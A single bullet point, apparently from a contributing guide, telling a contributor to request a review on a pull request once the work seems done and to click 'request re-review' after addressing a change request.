- Every time you make changes to the PR and you think the work is done, you should explicitly ask for a review. After receiving a "change request", address the feedback and click "request re-review" next to the reviewer's profile picture at the top right.
